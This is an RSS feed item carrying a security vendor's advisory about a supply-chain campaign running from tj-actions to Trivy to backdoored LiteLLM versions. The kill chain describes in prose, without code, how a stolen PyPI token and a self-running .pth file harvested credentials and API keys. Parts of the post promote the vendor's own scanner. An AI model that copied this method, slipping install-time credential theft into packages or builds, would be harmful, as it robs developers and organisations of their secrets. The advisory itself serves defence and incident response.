<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0">
  <channel>
    <title>Vigilant Research</title>
    <link>https://vigilantdefense.com/research</link>
    <description>Vigilant Research delivers cybersecurity analysis, threat intelligence, technical findings, and field-driven insights to help Decision makers and defenders understand real-world risk.</description>
    <language>en</language>
    <pubDate>Tue, 11 Aug 2026 16:35:21 GMT</pubDate>
    <dc:date>2026-08-11T16:35:21Z</dc:date>
    <dc:language>en</dc:language>
    <item>
      <title>From Scanner to Weapon: Inside the Supply Chain Attack That Backdoored the #1 AI Key Management Library</title>
      <link>https://vigilantdefense.com/research/from-scanner-to-weapon-inside-the-supply-chain-attack-that-backdoored-the-1-ai-key-management-library</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://vigilantdefense.com/research/from-scanner-to-weapon-inside-the-supply-chain-attack-that-backdoored-the-1-ai-key-management-library" title="" class="hs-featured-image-link"&gt; &lt;img src="https://vigilantdefense.com/hubfs/litellmteampcp.png" alt="From Scanner to Weapon: Inside the Supply Chain Attack That Backdoored the #1 AI Key Management Library" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;div style="max-width: 720px; margin: 0 auto; font-family: 'Barlow',Arial,Helvetica,sans-serif; color: #2d3748; line-height: 1.75; font-size: 16px;"&gt;  
 &lt;p style="margin: 0 0 6px 0; font-size: 11px; font-weight: bold; letter-spacing: 2.5px; color: #ff5d2c; text-transform: uppercase;"&gt;Vigilant Research&lt;/p&gt; 
 &lt;h1 style="margin: 0 0 8px 0; font-size: 32px; font-weight: 800; color: #07161d; line-height: 1.2; font-family: 'Barlow',Arial,sans-serif;"&gt;Software Supply Chain Attack Escalation: Trivy, LiteLLM, and the 50K-Repo Vulnerability Landscape&lt;/h1&gt; 
 &lt;p style="margin: 0 0 28px 0; font-size: 14px; color: #718096;"&gt;March 25, 2026 &amp;nbsp;|&amp;nbsp; Threat Level: &lt;strong style="color: #ff5d2c;"&gt;CRITICAL&lt;/strong&gt;&lt;/p&gt;  
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;Over the past three weeks, a threat actor known as &lt;strong style="color: #07161d;"&gt;TeamPCP&lt;/strong&gt; has executed a cascading software supply chain attack that represents the most significant CI/CD threat tracked to date. What began as a single compromised GitHub Action has escalated into a multi-hop campaign that has now reached the AI infrastructure layer, compromising the package that manages LLM API keys for organizations worldwide.&lt;/p&gt; 
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;This is not theoretical. Three confirmed attacks in three weeks, each using the previous compromise as a stepping stone:&lt;/p&gt; 
 &lt;ul style="margin: 0 0 12px 0; padding-left: 24px;"&gt; 
  &lt;li style="margin-bottom: 8px;"&gt;&lt;strong style="color: #07161d;"&gt;March 12 - tj-actions/changed-files:&lt;/strong&gt; Attackers compromised a widely-used GitHub Action, injecting code that stole secrets from thousands of CI/CD pipelines&lt;/li&gt; 
  &lt;li style="margin-bottom: 8px;"&gt;&lt;strong style="color: #07161d;"&gt;March 19 - Aqua Security Trivy:&lt;/strong&gt; The same attackers compromised Trivy, one of the most widely-used open-source vulnerability scanners. The tool designed to find security issues became the attack vector&lt;/li&gt; 
  &lt;li style="margin-bottom: 8px;"&gt;&lt;strong style="color: #07161d;"&gt;March 24 - BerriAI LiteLLM:&lt;/strong&gt; LiteLLM, the most popular AI API key management gateway (97 million monthly downloads), was backdoored via its own CI/CD pipeline, which ran the compromised Trivy scanner. Every organization that updated to version 1.82.7 or 1.82.8 had all environment variables, SSH keys, cloud credentials, and AI API keys exfiltrated to an attacker-controlled server&lt;/li&gt; 
 &lt;/ul&gt; 
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;Vigilant anticipated this escalation pattern. Three weeks ago, we completed the &lt;strong style="color: #07161d;"&gt;largest CI/CD security scan ever conducted&lt;/strong&gt;, scanning the 50,000 most-starred repositories on GitHub. We found that &lt;strong style="color: #07161d;"&gt;20,265 repositories (40.6%) have the same class of vulnerability&lt;/strong&gt; that enabled this attack chain. The full research is published at &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan" style="color: #00a19b; text-decoration: none; font-weight: 600;"&gt;vigilantdefense.com/research&lt;/a&gt;.&lt;/p&gt;    
 &lt;div style="background: #141922; padding: 28px 28px 32px; font-family: 'Georgia',serif; border-radius: 14px; margin: 36px 0;"&gt; 
  &lt;div style="font-family: sans-serif; font-size: 11px; font-weight: bold; letter-spacing: .14em; color: #2db8a0; margin-bottom: 18px;"&gt;
    VIGILANT 
   &lt;span style="color: #ffffff66;"&gt;/&lt;/span&gt; RESEARCH 
  &lt;/div&gt; 
  &lt;div style="font-family: sans-serif; font-size: 26px; font-weight: 800; color: #f0ede8; line-height: 1.2; margin-bottom: 6px;"&gt;
    How a security scanner 
   &lt;br&gt;became the weapon 
  &lt;/div&gt; 
  &lt;div style="width: 48px; height: 3px; background: #e5533a; margin: 14px 0 16px;"&gt;
    &amp;nbsp; 
  &lt;/div&gt; 
  &lt;div style="font-size: 15px; color: #8a9baa; line-height: 1.65; max-width: 520px; margin-bottom: 28px;"&gt;
    The Trivy-to-LiteLLM attack chain: how attackers turned the most popular vulnerability scanner into a delivery mechanism for backdooring the #1 AI key management library. 
  &lt;/div&gt;  
  &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #2db8a0; margin-bottom: 14px;"&gt;
    THE THREE-HOP CHAIN 
  &lt;/div&gt; 
  &lt;div style="margin-bottom: 28px;"&gt; 
   &lt;div style="display: inline-block; padding: 8px 14px; background: #1c2433; border-radius: 6px; vertical-align: middle;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 12px; color: #8a9baa;"&gt;
      March 12 
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 15px; font-weight: bold; color: #c2cad4;"&gt;
      tj-actions 
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;span style="font-size: 18px; color: #e5533a; padding: 0 6px; font-family: sans-serif; vertical-align: middle;"&gt;→&lt;/span&gt; 
   &lt;div style="display: inline-block; padding: 8px 14px; background: #1c2433; border-radius: 6px; border: 1px solid rgba(229,83,58,0.27); vertical-align: middle;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 12px; color: #8a9baa;"&gt;
      March 19 
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 15px; font-weight: bold; color: #f0a080;"&gt;
      Trivy 
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;span style="font-size: 18px; color: #e5533a; padding: 0 6px; font-family: sans-serif; vertical-align: middle;"&gt;→&lt;/span&gt; 
   &lt;div style="display: inline-block; padding: 8px 14px; background: #1c2433; border-radius: 6px; border: 1px solid #e5533a; vertical-align: middle;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 12px; color: #8a9baa;"&gt;
      March 24 
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 15px; font-weight: bold; color: #f0a080;"&gt;
      LiteLLM 
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;span style="font-size: 18px; color: #e5533a; padding: 0 6px; font-family: sans-serif; vertical-align: middle;"&gt;→&lt;/span&gt; 
   &lt;div style="display: inline-block; padding: 8px 14px; background: #162824; border-radius: 6px; border: 1px solid #2db8a0; vertical-align: middle;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 12px; color: #2db8a0;"&gt;
      Impact 
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 15px; font-weight: bold; color: #2db8a0;"&gt;
      Every AI key in your org 
    &lt;/div&gt; 
   &lt;/div&gt; 
  &lt;/div&gt;  
  &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #2db8a0; margin-bottom: 16px;"&gt;
    KILL CHAIN 
  &lt;/div&gt; 
  &lt;div style="border-left: 2px solid #2a3545; padding-left: 20px; margin-bottom: 30px;"&gt; 
   &lt;div style="margin-bottom: 20px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 14px; font-weight: bold; color: #f0ede8; margin-bottom: 3px;"&gt; 
     &lt;span style="color: #e5533a;"&gt;●&lt;/span&gt; Step 1: Compromise Trivy 
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
      TeamPCP backdoors Aqua Security's open-source vulnerability scanner through its GitHub Action. The tool meant to 
     &lt;em&gt;find&lt;/em&gt; malware becomes the delivery mechanism. 
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="margin-bottom: 20px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 14px; font-weight: bold; color: #f0ede8; margin-bottom: 3px;"&gt; 
     &lt;span style="color: #e5533a;"&gt;●&lt;/span&gt; Step 2: Trivy runs unpinned in LiteLLM's CI 
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
      LiteLLM's build pipeline pulls Trivy from apt with no pinned version. When Trivy was compromised, attacker code ran automatically inside the build. 
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="margin-bottom: 20px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 14px; font-weight: bold; color: #f0ede8; margin-bottom: 3px;"&gt; 
     &lt;span style="color: #e5533a;"&gt;●&lt;/span&gt; Step 3: PyPI publish token stolen 
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
      An overly permissive CI token was exfiltrated straight from the GitHub Actions runner. This token had the ability to push new packages to PyPI. 
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="margin-bottom: 20px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 14px; font-weight: bold; color: #f0ede8; margin-bottom: 3px;"&gt; 
     &lt;span style="color: #e5533a;"&gt;●&lt;/span&gt; Step 4: Malicious versions pushed to PyPI 
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
      litellm 1.82.7 and 1.82.8 ship a hidden 
     &lt;span style="font-family: monospace; color: #2db8a0; font-size: 12px;"&gt;.pth&lt;/span&gt; file. It executes at Python start. No import needed. Just having the package installed is enough. 
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="margin-bottom: 20px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 14px; font-weight: bold; color: #f0ede8; margin-bottom: 3px;"&gt; 
     &lt;span style="color: #e5533a;"&gt;●&lt;/span&gt; Step 5: Credential harvesting 
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
      The payload collects all environment variables, SSH keys, and cloud credentials, then sends everything to attacker-controlled infrastructure. 
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 14px; font-weight: bold; color: #f0ede8; margin-bottom: 3px;"&gt; 
     &lt;span style="color: #2db8a0;"&gt;●&lt;/span&gt; Step 6: Every AI key harvested 
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
      LiteLLM is specifically designed to hold and manage API keys for OpenAI, Anthropic, Azure, AWS Bedrock, and every other major LLM provider. The attacker targeted the one package that by definition has access to every AI API key in an organization. 
    &lt;/div&gt; 
   &lt;/div&gt; 
  &lt;/div&gt;  
  &lt;div style="margin-bottom: 28px;"&gt; 
   &lt;div style="display: inline-block; width: 31%; background: #1c2433; padding: 16px 20px; border-radius: 8px; vertical-align: top; margin-right: 2%;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 36px; font-weight: 800; color: #e5533a; line-height: 1;"&gt;
      97M 
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 10px; letter-spacing: .1em; color: #5a6a7a; margin-top: 6px; font-weight: bold;"&gt;
      MONTHLY DOWNLOADS AT RISK 
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="display: inline-block; width: 31%; background: #1c2433; padding: 16px 20px; border-radius: 8px; vertical-align: top; margin-right: 2%;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 36px; font-weight: 800; color: #e5533a; line-height: 1;"&gt;
      20,265 
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 10px; letter-spacing: .1em; color: #5a6a7a; margin-top: 6px; font-weight: bold;"&gt;
      REPOS WITH THE SAME VULN PROFILE 
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="display: inline-block; width: 31%; background: #1c2433; padding: 16px 20px; border-radius: 8px; vertical-align: top;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 36px; font-weight: 800; color: #e5533a; line-height: 1;"&gt;
      590M 
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 10px; letter-spacing: .1em; color: #5a6a7a; margin-top: 6px; font-weight: bold;"&gt;
      DOWNSTREAM FORKS EXPOSED 
    &lt;/div&gt; 
   &lt;/div&gt; 
  &lt;/div&gt;  
  &lt;div style="background: #1c2433; border-radius: 8px; padding: 18px 20px; margin-bottom: 28px;"&gt; 
   &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #e5533a; margin-bottom: 14px;"&gt;
     WE SCANNED LITELLM BEFORE THIS ATTACK HAPPENED 
   &lt;/div&gt; 
   &lt;div style="font-size: 13px; color: #8a9baa; line-height: 1.65; margin-bottom: 16px;"&gt;
     Our scan of GitHub's top 50K repos flagged 
    &lt;strong style="color: #f0ede8; font-family: sans-serif;"&gt;135 CI/CD vulnerabilities&lt;/strong&gt; in LiteLLM across 6 categories. Here is what the exposure looked like: 
   &lt;/div&gt; 
   &lt;div&gt; 
    &lt;div style="margin-bottom: 8px;"&gt; 
     &lt;div style="display: inline-block; font-family: sans-serif; font-size: 22px; font-weight: 800; color: #e5533a; min-width: 36px; vertical-align: middle;"&gt;
       3 
     &lt;/div&gt; 
     &lt;div style="display: inline-block; vertical-align: middle;"&gt; 
      &lt;div style="font-family: sans-serif; font-size: 12px; font-weight: bold; color: #f0ede8;"&gt;
        Critical vulnerabilities 
      &lt;/div&gt; 
      &lt;div style="font-size: 12px; color: #5a6a7a;"&gt;
        Expression injection with secret exposure. Direct path to compromise 
      &lt;/div&gt; 
     &lt;/div&gt; 
    &lt;/div&gt; 
    &lt;div style="height: 1px; background: #2a3545; margin-bottom: 8px;"&gt;
      &amp;nbsp; 
    &lt;/div&gt; 
    &lt;div style="margin-bottom: 8px;"&gt; 
     &lt;div style="display: inline-block; font-family: sans-serif; font-size: 22px; font-weight: 800; color: #e5533a; min-width: 36px; vertical-align: middle;"&gt;
       60 
     &lt;/div&gt; 
     &lt;div style="display: inline-block; vertical-align: middle;"&gt; 
      &lt;div style="font-family: sans-serif; font-size: 12px; font-weight: bold; color: #f0ede8;"&gt;
        Unpinned GitHub Actions 
      &lt;/div&gt; 
      &lt;div style="font-size: 12px; color: #5a6a7a;"&gt;
        Any of these can be swapped for malicious code mid-build 
      &lt;/div&gt; 
     &lt;/div&gt; 
    &lt;/div&gt; 
    &lt;div style="height: 1px; background: #2a3545; margin-bottom: 8px;"&gt;
      &amp;nbsp; 
    &lt;/div&gt; 
    &lt;div style="margin-bottom: 8px;"&gt; 
     &lt;div style="display: inline-block; font-family: sans-serif; font-size: 22px; font-weight: 800; color: #e5533a; min-width: 36px; vertical-align: middle;"&gt;
       22 
     &lt;/div&gt; 
     &lt;div style="display: inline-block; vertical-align: middle;"&gt; 
      &lt;div style="font-family: sans-serif; font-size: 12px; font-weight: bold; color: #f0ede8;"&gt;
        Overly permissive tokens 
      &lt;/div&gt; 
      &lt;div style="font-size: 12px; color: #5a6a7a;"&gt;
        The exact class of flaw that handed attackers the PyPI publish key 
      &lt;/div&gt; 
     &lt;/div&gt; 
    &lt;/div&gt; 
    &lt;div style="height: 1px; background: #2a3545; margin-bottom: 8px;"&gt;
      &amp;nbsp; 
    &lt;/div&gt; 
    &lt;div style="margin-bottom: 8px;"&gt; 
     &lt;div style="display: inline-block; font-family: sans-serif; font-size: 22px; font-weight: 800; color: #e5533a; min-width: 36px; vertical-align: middle;"&gt;
       21 
     &lt;/div&gt; 
     &lt;div style="display: inline-block; vertical-align: middle;"&gt; 
      &lt;div style="font-family: sans-serif; font-size: 12px; font-weight: bold; color: #f0ede8;"&gt;
        Comment/issue triggers without auth checks 
      &lt;/div&gt; 
      &lt;div style="font-size: 12px; color: #5a6a7a;"&gt;
        External users can trigger privileged workflows 
      &lt;/div&gt; 
     &lt;/div&gt; 
    &lt;/div&gt; 
    &lt;div style="height: 1px; background: #2a3545; margin-bottom: 8px;"&gt;
      &amp;nbsp; 
    &lt;/div&gt; 
    &lt;div style="margin-bottom: 8px;"&gt; 
     &lt;div style="display: inline-block; font-family: sans-serif; font-size: 22px; font-weight: 800; color: #e5533a; min-width: 36px; vertical-align: middle;"&gt;
       20 
     &lt;/div&gt; 
     &lt;div style="display: inline-block; vertical-align: middle;"&gt; 
      &lt;div style="font-family: sans-serif; font-size: 12px; font-weight: bold; color: #f0ede8;"&gt;
        Expression injection in action inputs 
      &lt;/div&gt; 
      &lt;div style="font-size: 12px; color: #5a6a7a;"&gt;
        Unsanitized inputs that execute attacker-controlled code 
      &lt;/div&gt; 
     &lt;/div&gt; 
    &lt;/div&gt; 
    &lt;div style="height: 1px; background: #2a3545; margin-bottom: 8px;"&gt;
      &amp;nbsp; 
    &lt;/div&gt; 
    &lt;div style="margin-bottom: 0;"&gt; 
     &lt;div style="display: inline-block; font-family: sans-serif; font-size: 22px; font-weight: 800; color: #e5533a; min-width: 36px; vertical-align: middle;"&gt;
       9 
     &lt;/div&gt; 
     &lt;div style="display: inline-block; vertical-align: middle;"&gt; 
      &lt;div style="font-family: sans-serif; font-size: 12px; font-weight: bold; color: #f0ede8;"&gt;
        Network exfiltration in privileged context 
      &lt;/div&gt; 
      &lt;div style="font-size: 12px; color: #5a6a7a;"&gt;
        Outbound network access from steps with secret access 
      &lt;/div&gt; 
     &lt;/div&gt; 
    &lt;/div&gt; 
   &lt;/div&gt; 
  &lt;/div&gt;  
  &lt;div style="background: #162824; border: 1px solid #2db8a0; border-radius: 8px; padding: 20px 24px; margin-bottom: 28px; text-align: center;"&gt; 
   &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #2db8a0; margin-bottom: 10px;"&gt;
     CONTINUOUS MONITORING 
   &lt;/div&gt; 
   &lt;div style="font-family: sans-serif; font-size: 18px; font-weight: 800; color: #f0ede8; line-height: 1.3; margin-bottom: 8px;"&gt;
     Runner Guard is the free scanner. 
    &lt;br&gt;ThreatCERT is the enterprise platform behind it. 
   &lt;/div&gt; 
   &lt;div style="font-size: 13px; color: #8a9baa; line-height: 1.6; margin-bottom: 16px; max-width: 480px; margin-left: auto; margin-right: auto;"&gt;
     Continuous CI/CD monitoring, supply chain risk scoring, and real-time alerting correlated with network, DNS, TLS, and dark web intelligence across your entire vendor chain. 
   &lt;/div&gt; 
   &lt;a href="https://www.vigilantdefense.com/threatcert" style="display: inline-block; padding: 12px 32px; background: #2db8a0; border-radius: 6px; font-family: sans-serif; font-size: 13px; font-weight: bold; color: #ffffff; text-decoration: none; letter-spacing: .5px;"&gt;LEARN ABOUT THREATCERT&lt;/a&gt; 
  &lt;/div&gt;  
  &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #2db8a0; margin-bottom: 16px;"&gt;
    WHY THIS ATTACK IS DIFFERENT 
  &lt;/div&gt; 
  &lt;div style="margin-bottom: 28px;"&gt; 
   &lt;div style="background: #1c2433; border-radius: 8px; padding: 16px 20px; border-left: 3px solid #e5533a; margin-bottom: 12px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 13px; font-weight: bold; color: #f0ede8; margin-bottom: 4px;"&gt;
      No click required 
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
      This was not phishing. The attack was delivered through a routine software update. Any developer who ran 
     &lt;span style="font-family: monospace; color: #2db8a0; font-size: 12px;"&gt;pip install --upgrade litellm&lt;/span&gt; was compromised automatically. 
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="background: #1c2433; border-radius: 8px; padding: 16px 20px; border-left: 3px solid #e5533a; margin-bottom: 12px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 13px; font-weight: bold; color: #f0ede8; margin-bottom: 4px;"&gt;
      Security tools were the weapon 
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
      The attackers compromised a vulnerability scanner. Organizations that were actively trying to be secure were the ones who got hit. 
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="background: #1c2433; border-radius: 8px; padding: 16px 20px; border-left: 3px solid #e5533a; margin-bottom: 12px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 13px; font-weight: bold; color: #f0ede8; margin-bottom: 4px;"&gt;
      AI keys are the prize 
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
      LiteLLM manages API keys for OpenAI, Anthropic, Azure, AWS, and every other major AI provider. The attacker targeted the one package that has access to every AI API key in an organization. 
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="background: #1c2433; border-radius: 8px; padding: 16px 20px; border-left: 3px solid #e5533a;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 13px; font-weight: bold; color: #f0ede8; margin-bottom: 4px;"&gt;
      Transitive dependencies are attack vectors 
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
      The compromise was discovered when an MCP plugin pulled LiteLLM as a transitive dependency. Developers who never directly installed it were still exposed. 
    &lt;/div&gt; 
   &lt;/div&gt; 
  &lt;/div&gt;  
  &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #2db8a0; margin-bottom: 16px;"&gt;
    THE BROADER LANDSCAPE: 50,000 REPOS SCANNED 
  &lt;/div&gt; 
  &lt;div style="font-size: 13px; color: #8a9baa; line-height: 1.65; margin-bottom: 16px;"&gt;
    Vigilant conducted the largest CI/CD security scan ever performed. The numbers speak for themselves: 
  &lt;/div&gt; 
  &lt;div style="margin-bottom: 12px;"&gt; 
   &lt;div style="display: inline-block; width: 48%; background: #1c2433; padding: 16px 20px; border-radius: 8px; text-align: center; vertical-align: top; margin-right: 2%;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 36px; font-weight: 800; color: #2db8a0; line-height: 1;"&gt;
      50,012 
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 10px; letter-spacing: .1em; color: #5a6a7a; margin-top: 6px; font-weight: bold;"&gt;
      REPOS SCANNED 
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="display: inline-block; width: 48%; background: #1c2433; padding: 16px 20px; border-radius: 8px; text-align: center; vertical-align: top;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 36px; font-weight: 800; color: #e5533a; line-height: 1;"&gt;
      192,776 
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 10px; letter-spacing: .1em; color: #5a6a7a; margin-top: 6px; font-weight: bold;"&gt;
      VULNERABILITIES FOUND 
    &lt;/div&gt; 
   &lt;/div&gt; 
  &lt;/div&gt; 
  &lt;div style="margin-bottom: 28px;"&gt; 
   &lt;div style="display: inline-block; width: 48%; background: #1c2433; padding: 16px 20px; border-radius: 8px; text-align: center; vertical-align: top; margin-right: 2%;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 36px; font-weight: 800; color: #e5533a; line-height: 1;"&gt;
      40.6% 
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 10px; letter-spacing: .1em; color: #5a6a7a; margin-top: 6px; font-weight: bold;"&gt;
      VULNERABLE RATE 
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="display: inline-block; width: 48%; background: #1c2433; padding: 16px 20px; border-radius: 8px; text-align: center; vertical-align: top;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 36px; font-weight: 800; color: #e5533a; line-height: 1;"&gt;
      68% 
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 10px; letter-spacing: .1em; color: #5a6a7a; margin-top: 6px; font-weight: bold;"&gt;
      VULN RATE FOR 50K+ STAR REPOS 
    &lt;/div&gt; 
   &lt;/div&gt; 
  &lt;/div&gt;  
  &lt;div style="border-top: 1px solid #2a3545; padding-top: 20px; margin-bottom: 20px;"&gt; 
   &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #2db8a0; margin-bottom: 10px;"&gt;
     SCAN YOURS NOW 
   &lt;/div&gt; 
   &lt;div style="font-family: monospace; font-size: 12px; background: #0d1117; border-radius: 6px; padding: 12px 16px; color: #2db8a0; line-height: 2; border-left: 3px solid #2db8a0;"&gt;
     brew install Vigilant-LLC/tap/runner-guard 
    &lt;br&gt;runner-guard scan . 
   &lt;/div&gt; 
  &lt;/div&gt;  
  &lt;a href="https://www.vigilantdefense.com/threatcert" style="display: block; background: #e5533a; border-radius: 8px; padding: 16px 24px; text-align: center; text-decoration: none; margin-bottom: 0;"&gt; 
   &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #ffffff99; margin-bottom: 4px;"&gt;
     FROM THE MAKERS OF RUNNER GUARD 
   &lt;/div&gt; 
   &lt;div style="font-family: sans-serif; font-size: 16px; font-weight: 800; color: #ffffff;"&gt;
     Get Continuous Protection with ThreatCERT 
   &lt;/div&gt; &lt;/a&gt; 
 &lt;/div&gt;   
 &lt;h2 style="margin: 36px 0 12px 0; font-size: 22px; font-weight: 800; color: #07161d; font-family: 'Barlow',Arial,sans-serif;"&gt;How the LiteLLM Attack Worked&lt;/h2&gt; 
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;This attack is a textbook example of a multi-hop supply chain compromise. Each step was deliberate and calculated:&lt;/p&gt; 
 &lt;ol style="margin: 0 0 24px 0; padding-left: 24px;"&gt; 
  &lt;li style="margin-bottom: 10px;"&gt;Attackers compromised Aqua Security's Trivy vulnerability scanner through its GitHub Action&lt;/li&gt; 
  &lt;li style="margin-bottom: 10px;"&gt;LiteLLM's CI/CD pipeline ran Trivy as part of its build process, pulled without a pinned version&lt;/li&gt; 
  &lt;li style="margin-bottom: 10px;"&gt;The compromised Trivy exfiltrated LiteLLM's PyPI publish token from the CI/CD runner&lt;/li&gt; 
  &lt;li style="margin-bottom: 10px;"&gt;Attackers used the stolen token to push malicious LiteLLM versions (1.82.7, 1.82.8) to PyPI&lt;/li&gt; 
  &lt;li style="margin-bottom: 10px;"&gt;A hidden &lt;code style="background: #F0F0F0; padding: 2px 6px; border-radius: 3px; font-size: 14px;"&gt;.pth&lt;/code&gt; file executes automatically when Python starts. No import needed. Just having the package installed is enough&lt;/li&gt; 
  &lt;li style="margin-bottom: 10px;"&gt;The payload harvested all environment variables, SSH keys, cloud credentials, and AI API keys, then sent everything to attacker infrastructure&lt;/li&gt; 
 &lt;/ol&gt; 
 &lt;h2 style="margin: 36px 0 12px 0; font-size: 22px; font-weight: 800; color: #07161d; font-family: 'Barlow',Arial,sans-serif;"&gt;Why This Matters to Your Organization&lt;/h2&gt; 
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;LiteLLM is not an obscure library. It is the most widely used AI API gateway, with 97 million monthly downloads. It is specifically designed to hold and manage API keys for OpenAI, Anthropic, Azure, AWS Bedrock, and every other major LLM provider. The attacker deliberately targeted the one package that, by definition, has access to every AI API key in an organization.&lt;/p&gt; 
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;If your organization uses LiteLLM, or uses any software that depends on LiteLLM as a transitive dependency, you may be affected. The malicious payload was discovered when an MCP plugin running inside a code editor pulled the compromised package as a transitive dependency, meaning developers who never directly installed LiteLLM were still exposed.&lt;/p&gt; 
 &lt;div style="background-color: #fff4ee; border-left: 4px solid #FF5D2C; padding: 16px 20px; border-radius: 0 4px 4px 0; margin: 24px 0;"&gt; 
  &lt;p style="margin: 0; font-size: 16px; line-height: 1.75; color: #07161d; font-family: 'Barlow',Arial,sans-serif;"&gt;&lt;strong&gt;The critical takeaway:&lt;/strong&gt; This attack did not require clicking a link, opening an email, or visiting a website. It was delivered through a routine software update. Any organization that ran &lt;code style="background: #F0F0F0; padding: 2px 6px; border-radius: 3px; font-size: 14px;"&gt;pip install --upgrade litellm&lt;/code&gt; in the past 48 hours should assume credential compromise and begin rotation immediately.&lt;/p&gt; 
 &lt;/div&gt; 
 &lt;h2 style="margin: 36px 0 12px 0; font-size: 22px; font-weight: 800; color: #07161d; font-family: 'Barlow',Arial,sans-serif;"&gt;Vigilant's Research: We Found This Pattern Before the Attack&lt;/h2&gt; 
